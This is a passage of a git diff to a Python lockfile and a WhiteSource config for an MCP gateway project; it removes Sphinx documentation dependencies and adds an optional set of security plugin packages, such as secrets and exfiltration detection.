"https://files.pythonhosted.org/packages/ba/5a/18ad964b0086c6e62e2e7500f7edc89e3faa45033c71c1893d34eed2b2de/dnspython-2.8.0-py3-none-any.whl", hash = "sha256:01d9bbc4a2d76bf0db7c1f729812ded6d912bd318d3b1cf81d30c0f845dbf3af", size = 331094, upload-time = "2025-09-07T18:57:58.071Z" }, ] -[[package]] -name = "docsig" -version = "0.72.2" -source = { registry = "https://pypi.org/simple" } -dependencies = [ - { name = "astroid" }, - { name = "pathspec" }, - { name = "sphinx" }, - { name = "tomli" }, - { name = "wcmatch" }, -] -sdist = { url = "https://files.pythonhosted.org/packages/8e/0d/0ba694573d1d62e987929086895e4852b183f63b2ebf764c6d2a3ff807d0/docsig-0.72.2.tar.gz", hash = "sha256:1b9c0e05825961227225b0df916167d007420e29735729e03b053d320c581397", size = 27157, upload-time = "2025-12-25T02:19:39.081Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/6a/b8/668f3a38b230da06ac69923fabf400cfb8606b40f40e5cd94493c637dd17/docsig-0.72.2-py3-none-any.whl", hash = "sha256:f04fc683dfb9e8dc6dbf4bb14269a47de8a29b10d988678faf59080e5f5e5a90", size = 31211, upload-time = "2025-12-25T02:19:37.237Z" }, -] - [[package]] name = "docutils" version = "0.21.2" @@ -1888,15 +1950,6 @@ wheels = [ { url = "https://files.pythonhosted.org/packages/0e/61/66938bbb5fc52dbdf84594873d5b51fb1f7c7794e9c0f5bd885f30bc507b/idna-3.11-py3-none-any.whl", hash = "sha256:771a87f49d9defaf64091e6e6fe9c18d4833f140bd19464795bc32d966ca37ea", size = 71008, upload-time = "2025-10-12T14:55:18.883Z" }, ] -[[package]] -name = "imagesize" -version = "2.0.0" -source = { registry = "https://pypi.org/simple" } -sdist = { url = "https://files.pythonhosted.org/packages/6c/e6/7bf14eeb8f8b7251141944835abd42eb20a658d89084b7e1f3e5fe394090/imagesize-2.0.0.tar.gz", hash = "sha256:8e8358c4a05c304f1fccf7ff96f036e7243a189e9e42e90851993c558cfe9ee3", size = 1773045, upload-time = "2026-03-03T14:18:29.941Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/5f/53/fb7122b71361a0d121b669dcf3d31244ef75badbbb724af388948de543e2/imagesize-2.0.0-py2.py3-none-any.whl", hash = "sha256:5667c5bbb57ab3f1fa4bc366f4fbc971db3d5ed011fd2715fd8001f782718d96", size = 9441, upload-time = "2026-03-03T14:18:27.892Z" }, -] - [[package]] name = "immutabledict" version = "4.3.1" @@ -2824,6 +2877,12 @@ asyncpg = [ { name = "asyncpg" }, ] dev-all = [ + { name = "cpex-encoded-exfil-detection" }, + { name = "cpex-pii-filter" }, + { name = "cpex-rate-limiter" }, + { name = "cpex-retry-with-backoff" }, + { name = "cpex-secrets-detection" }, + { name = "cpex-url-reputation" }, { name = "redis", extra = ["hiredis"] }, ] fuzz = [ @@ -2864,6 +2923,14 @@ playwright = [ { name = "pytest-timeout" }, { name = "python-owasp-zap-v2-4" }, ] +plugins = [ + { name = "cpex-encoded-exfil-detection" }, + { name = "cpex-pii-filter" }, + { name = "cpex-rate-limiter" }, + { name = "cpex-retry-with-backoff" }, + { name = "cpex-secrets-detection" }, + { name = "cpex-url-reputation" }, +] postgres = [ { name = "psycopg", extra = ["binary", "c"] }, ] @@ -2897,7 +2964,6 @@ dev = [ { name = "debugpy" }, { name = "detect-secrets" }, { name = "diff-cover" }, - { name = "docsig" }, { name = "dodgy" }, { name = "faker" }, { name = "fawltydeps" }, @@ -2970,6 +3036,12 @@ requires-dist = [ { name = "asyncpg", marker = "extra == 'asyncpg'", specifier = ">=0.31.0" }, { name = "atheris", marker = "extra == 'fuzz-atheris'", specifier = ">=3.0.0" }, { name = "cookiecutter", marker = "extra == 'templating'", specifier = ">=2.7.1" }, + { name = "cpex-encoded-exfil-detection", marker = "extra == 'plugins'", specifier = ">=0.2.0" }, + { name = "cpex-pii-filter", marker = "extra == 'plugins'", specifier = ">=0.2.0" }, + { name = "cpex-rate-limiter", marker = "extra == 'plugins'", specifier = ">=0.0.3" }, + { name = "cpex-retry-with-backoff", marker = "extra == 'plugins'", specifier = ">=0.1.0" }, + { name = "cpex-secrets-detection", marker = "extra == 'plugins'", specifier = ">=0.1.0" }, + { name = "cpex-url-reputation", marker = "extra == 'plugins'", specifier = ">=0.1.1" }, { name = "cryptography", specifier = ">=46.0.5" }, { name = "fastapi", specifier = ">=0.135.1" }, { name = "filelock", specifier = ">=3.25.2" }, @@ -2992,7 +3064,7 @@ requires-dist = [ { name = "langgraph", marker = "extra == 'llmchat'", specifier = ">=1.1.2" }, { name = "mcp", specifier = ">=1.26.0" }, { name = "mcp-contextforge-gateway", extras = ["redis"], marker = "extra == 'all'", specifier = ">=0.9.0" }, - { name = "mcp-contextforge-gateway", extras = ["redis", "dev"], marker = "extra == 'dev-all'", specifier = ">=0.9.0" }, + { name = "mcp-contextforge-gateway", extras = ["redis", "dev", "plugins"], marker = "extra == 'dev-all'", specifier = ">=0.9.0" }, { name = "memray", marker = "extra == 'profiling'", specifier = ">=1.19.2" }, { name = "opentelemetry-api", marker = "extra == 'observability'", specifier = ">=1.40.0" }, { name = "opentelemetry-exporter-otlp-proto-grpc", marker = "extra == 'observability'", specifier = ">=1.40.0" }, @@ -3032,7 +3104,7 @@ requires-dist = [ { name = "urllib3", specifier = ">=2.6.3" }, { name = "uvicorn", extras = ["standard"], specifier = ">=0.42.0" }, ] -provides-extras = ["redis", "redis-pure", "postgres", "llmchat", "fuzz", "fuzz-atheris", "observability", "granian", "aiosqlite", "asyncpg", "profiling", "templating", "grpc", "playwright", "all", "dev-all"] +provides-extras = ["redis", "redis-pure", "postgres", "llmchat", "fuzz", "fuzz-atheris", "observability", "granian", "aiosqlite", "asyncpg", "profiling", "templating", "plugins", "grpc", "playwright", "all", "dev-all"] [package.metadata.requires-dev] dev = [ @@ -3050,7 +3122,6 @@ dev = [ { name = "debugpy", specifier = ">=1.8.20" }, { name = "detect-secrets", git = "https://github.com/ibm/detect-secrets.git?rev=076672a9a01abdfc7ecee2e7d14f08cdccb73976" }, { name = "diff-cover", specifier = ">=9.0.0" }, - { name = "docsig", specifier = ">=0.64.1" }, { name = "dodgy", specifier = ">=0.2.1" }, { name = "faker", specifier = ">=20.0.0" }, { name = "fawltydeps", specifier = ">=0.20.0" }, @@ -5387,27 +5458,6 @@ wheels = [ { url = "https://files.pythonhosted.org/packages/14/25/b208c5683343959b670dc001595f2f3737e051da617f66c31f7c4fa93abc/rich-14.3.3-py3-none-any.whl", hash = "sha256:793431c1f8619afa7d3b52b2cdec859562b950ea0d4b6b505397612db8d5362d", size = 310458, upload-time = "2026-02-19T17:23:13.732Z" }, ] -[[package]] -name = "roman-numerals" -version = "4.1.0" -source = { registry = "https://pypi.org/simple" } -sdist = { url = "https://files.pythonhosted.org/packages/ae/f9/41dc953bbeb056c17d5f7a519f50fdf010bd0553be2d630bc69d1e022703/roman_numerals-4.1.0.tar.gz", hash = "sha256:1af8b147eb1405d5839e78aeb93131690495fe9da5c91856cb33ad55a7f1e5b2", size = 9077, upload-time = "2025-12-17T18:25:34.381Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/04/54/6f679c435d28e0a568d8e8a7c0a93a09010818634c3c3907fc98d8983770/roman_numerals-4.1.0-py3-none-any.whl", hash = "sha256:647ba99caddc2cc1e55a51e4360689115551bf4476d90e8162cf8c345fe233c7", size = 7676, upload-time = "2025-12-17T18:25:33.098Z" }, -] - -[[package]] -name = "roman-numerals-py" -version = "4.1.0" -source = { registry = "https://pypi.org/simple" } -dependencies = [ - { name = "roman-numerals" }, -] -sdist = { url = "https://files.pythonhosted.org/packages/cb/b5/de96fca640f4f656eb79bbee0e79aeec52e3e0e359f8a3e6a0d366378b64/roman_numerals_py-4.1.0.tar.gz", hash = "sha256:f5d7b2b4ca52dd855ef7ab8eb3590f428c0b1ea480736ce32b01fef2a5f8daf9", size = 4274, upload-time = "2025-12-17T18:25:41.153Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/27/2c/daca29684cbe9fd4bc711f8246da3c10adca1ccc4d24436b17572eb2590e/roman_numerals_py-4.1.0-py3-none-any.whl", hash = "sha256:553114c1167141c1283a51743759723ecd05604a1b6b507225e91dc1a6df0780", size = 4547, upload-time = "2025-12-17T18:25:40.136Z" }, -] - [[package]] name = "rpds-py" version = "0.30.0" @@ -5727,88 +5777,6 @@ wheels = [ { url = "https://files.pythonhosted.org/packages/46/2c/1462b1d0a634697ae9e55b3cecdcb64788e8b7d63f54d923fcd0bb140aed/soupsieve-2.8.3-py3-none-any.whl", hash = "sha256:ed64f2ba4eebeab06cc4962affce381647455978ffc1e36bb79a545b91f45a95", size = 37016, upload-time = "2026-01-20T04:27:01.012Z" }, ] -[[package]] -name = "sphinx" -version = "8.2.3" -source = { registry = "https://pypi.org/simple" } -dependencies = [ - { name = "alabaster" }, - { name = "babel" }, - { name = "colorama", marker = "sys_platform == 'win32'" }, - { name = "docutils" }, - { name = "imagesize" }, - { name = "jinja2" }, - { name = "packaging" }, - { name = "pygments" }, - { name = "requests" }, - { name = "roman-numerals-py" }, - { name = "snowballstemmer" }, - { name = "sphinxcontrib-applehelp" }, - { name = "sphinxcontrib-devhelp" }, - { name = "sphinxcontrib-htmlhelp" }, - { name = "sphinxcontrib-jsmath" }, - { name = "sphinxcontrib-qthelp" }, - { name = "sphinxcontrib-serializinghtml" }, -] -sdist = { url = "https://files.pythonhosted.org/packages/38/ad/4360e50ed56cb483667b8e6dadf2d3fda62359593faabbe749a27c4eaca6/sphinx-8.2.3.tar.gz", hash = "sha256:398ad29dee7f63a75888314e9424d40f52ce5a6a87ae88e7071e80af296ec348", size = 8321876, upload-time = "2025-03-02T22:31:59.658Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/31/53/136e9eca6e0b9dc0e1962e2c908fbea2e5ac000c2a2fbd9a35797958c48b/sphinx-8.2.3-py3-none-any.whl", hash = "sha256:4405915165f13521d875a8c29c8970800a0141c14cc5416a38feca4ea5d9b9c3", size = 3589741, upload-time = "2025-03-02T22:31:56.836Z" }, -] - -[[package]] -name = "sphinxcontrib-applehelp" -version = "2.0.0" -source = { registry = "https://pypi.org/simple" } -sdist = { url = "https://files.pythonhosted.org/packages/ba/6e/b837e84a1a704953c62ef8776d45c3e8d759876b4a84fe14eba2859106fe/sphinxcontrib_applehelp-2.0.0.tar.gz", hash = "sha256:2f29ef331735ce958efa4734873f084941970894c6090408b079c61b2e1c06d1", size = 20053, upload-time = "2024-07-29T01:09:00.465Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/5d/85/9ebeae2f76e9e77b952f4b274c27238156eae7979c5421fba91a28f4970d/sphinxcontrib_applehelp-2.0.0-py3-none-any.whl", hash = "sha256:4cd3f0ec4ac5dd9c17ec65e9ab272c9b867ea77425228e68ecf08d6b28ddbdb5", size = 119300, upload-time = "2024-07-29T01:08:58.99Z" }, -] - -[[package]] -name = "sphinxcontrib-devhelp" -version = "2.0.0" -source = { registry = "https://pypi.org/simple" } -sdist = { url = "https://files.pythonhosted.org/packages/f6/d2/5beee64d3e4e747f316bae86b55943f51e82bb86ecd325883ef65741e7da/sphinxcontrib_devhelp-2.0.0.tar.gz", hash = "sha256:411f5d96d445d1d73bb5d52133377b4248ec79db5c793ce7dbe59e074b4dd1ad", size = 12967, upload-time = "2024-07-29T01:09:23.417Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/35/7a/987e583882f985fe4d7323774889ec58049171828b58c2217e7f79cdf44e/sphinxcontrib_devhelp-2.0.0-py3-none-any.whl", hash = "sha256:aefb8b83854e4b0998877524d1029fd3e6879210422ee3780459e28a1f03a8a2", size = 82530, upload-time = "2024-07-29T01:09:21.945Z" }, -] - -[[package]] -name = "sphinxcontrib-htmlhelp" -version = "2.1.0" -source = { registry = "https://pypi.org/simple" } -sdist = { url = "https://files.pythonhosted.org/packages/43/93/983afd9aa001e5201eab16b5a444ed5b9b0a7a010541e0ddfbbfd0b2470c/sphinxcontrib_htmlhelp-2.1.0.tar.gz", hash = "sha256:c9e2916ace8aad64cc13a0d233ee22317f2b9025b9cf3295249fa985cc7082e9", size = 22617, upload-time = "2024-07-29T01:09:37.889Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/0a/7b/18a8c0bcec9182c05a0b3ec2a776bba4ead82750a55ff798e8d406dae604/sphinxcontrib_htmlhelp-2.1.0-py3-none-any.whl", hash = "sha256:166759820b47002d22914d64a075ce08f4c46818e17cfc9470a9786b759b19f8", size = 98705, upload-time = "2024-07-29T01:09:36.407Z" }, -] - -[[package]] -name = "sphinxcontrib-jsmath" -version = "1.0.1" -source = { registry = "https://pypi.org/simple" } -sdist = { url = "https://files.pythonhosted.org/packages/b2/e8/9ed3830aeed71f17c026a07a5097edcf44b692850ef215b161b8ad875729/sphinxcontrib-jsmath-1.0.1.tar.gz", hash = "sha256:a9925e4a4587247ed2191a22df5f6970656cb8ca2bd6284309578f2153e0c4b8", size = 5787, upload-time = "2019-01-21T16:10:16.347Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/c2/42/4c8646762ee83602e3fb3fbe774c2fac12f317deb0b5dbeeedd2d3ba4b77/sphinxcontrib_jsmath-1.0.1-py2.py3-none-any.whl", hash = "sha256:2ec2eaebfb78f3f2078e73666b1415417a116cc848b72e5172e596c871103178", size = 5071, upload-time = "2019-01-21T16:10:14.333Z" }, -] - -[[package]] -name = "sphinxcontrib-qthelp" -version = "2.0.0" -source = { registry = "https://pypi.org/simple" } -sdist = { url = "https://files.pythonhosted.org/packages/68/bc/9104308fc285eb3e0b31b67688235db556cd5b0ef31d96f30e45f2e51cae/sphinxcontrib_qthelp-2.0.0.tar.gz", hash = "sha256:4fe7d0ac8fc171045be623aba3e2a8f613f8682731f9153bb2e40ece16b9bbab", size = 17165, upload-time = "2024-07-29T01:09:56.435Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/27/83/859ecdd180cacc13b1f7e857abf8582a64552ea7a061057a6c716e790fce/sphinxcontrib_qthelp-2.0.0-py3-none-any.whl", hash = "sha256:b18a828cdba941ccd6ee8445dbe72ffa3ef8cbe7505d8cd1fa0d42d3f2d5f3eb", size = 88743, upload-time = "2024-07-29T01:09:54.885Z" }, -] - -[[package]] -name = "sphinxcontrib-serializinghtml" -version = "2.0.0" -source = { registry = "https://pypi.org/simple" } -sdist = { url = "https://files.pythonhosted.org/packages/3b/44/6716b257b0aa6bfd51a1b31665d1c205fb12cb5ad56de752dfa15657de2f/sphinxcontrib_serializinghtml-2.0.0.tar.gz", hash = "sha256:e9d912827f872c029017a53f0ef2180b327c3f7fd23c87229f7a8e8b70031d4d", size = 16080, upload-time = "2024-07-29T01:10:09.332Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/52/a7/d2782e4e3f77c8450f727ba74a8f12756d5ba823d81b941f1b04da9d033a/sphinxcontrib_serializinghtml-2.0.0-py3-none-any.whl", hash = "sha256:6e2cb0eef194e10c27ec0023bfeb25badbbb5868244cf5bc5bdc04e4464bf331", size = 92072, upload-time = "2024-07-29T01:10:08.203Z" }, -] - [[package]] name = "sqlalchemy" version = "2.0.48" diff --git a/whitesource.config b/whitesource.config index 240d070b1b..ac860ecc23 100644 --- a/whitesource.config +++ b/whitesource.config @@ -27,5 +27,5 @@ python.IgnorePipenvInstallErrors=true # Includes/Excludes Glob patterns - Please use only one exclude line and one include line # ########################################################################################### -includes = **/mcpgateway/** **/plugins/** **/plugins_rust/encoded_exfil_detection/** pyproject.toml Containerfile.lite +includes = **/mcpgateway/** **/plugins/** pyproject.toml Containerfile.lite excludes = **/tests/** **/charts/** **/deploy/** **/deployment/** **/docs/** **/deployment/k8s/** **/mcp-servers/** ****/a2a-agents/** **/agent_runtimes/** **/infra/** **/plugin_templates/** **/scripts/** **/tools_rust/**